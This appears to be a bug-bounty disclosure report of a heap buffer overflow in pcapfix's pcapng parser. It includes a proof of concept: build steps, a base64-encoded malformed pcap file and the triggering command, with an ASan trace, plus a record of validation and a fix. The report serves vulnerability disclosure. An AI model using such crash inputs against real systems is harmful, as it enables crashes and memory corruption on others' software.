Heap-based Buffer Overflow in rup0rt/pcapfix

Valid

Reported on

Jun 9th 2021


✍️ Description

Whilst testing the 'devel' branch of pcapfix, specifically commit fb723ccompiled with clang-13 and -fsanitize=address on Ubuntu 20.04.2 LTS, we discovered a POC which triggers a heap-buffer-overflow.

🕵️‍♂️ Proof of Concept

git clone https://github.com/Rup0rt/pcapfix
cd pcapfix
CC=clang CFLAGS="-fsanitize=address" make
echo "Cg0NCvaPsvgUAAAAAEpaggAAAMeTilEAAABFAAA=" | base64 -d > /tmp/fuzz2.pcap
./pcapfix -v -s /tmp/fuzz2.pcap

The above POC produces this ASan stack trace:

==2556594==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000005d at pc 0x000000496d5a bp 0x7ffc1cef51b0 sp 0x7ffc1cef4978
WRITE of size 72 at 0x60300000005d thread T0
#0 0x496d59 in __asan_memcpy (/root/pcapfix/pcapfix+0x496d59)
#1 0x4d3fba in fix_pcapng /root/pcapfix/pcapng.c:371:11
#2 0x4c984d in main /root/pcapfix/pcapfix.c
#3 0x7f90330940b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#4 0x41c3ad in _start (/root/pcapfix/pcapfix+0x41c3ad)

0x60300000005d is located 0 bytes to the right of 29-byte region [0x603000000040,0x60300000005d)
allocated by thread T0 here:
#0 0x4978ed in __interceptor_malloc (/root/pcapfix/pcapfix+0x4978ed)
#1 0x4d316b in fix_pcapng /root/pcapfix/pcapng.c:213:17
#2 0x4c984d in main /root/pcapfix/pcapfix.c
#3 0x7f90330940b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/pcapfix/pcapfix+0x496d59) in __asan_memcpy

💥 Impact

This vulnerability is capable of crashing the software, memory corruption and other unintended consequences resulting from writing outside of the buffer.

Occurrences

geeknik modified the report
a year ago
Robert Krause validated this vulnerability a year ago
geeknik has been awarded the disclosure bounty
The fix bounty is now up for grabs
Robert Krause marked this as fixed with commit b16917 a year ago
Robert Krause has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation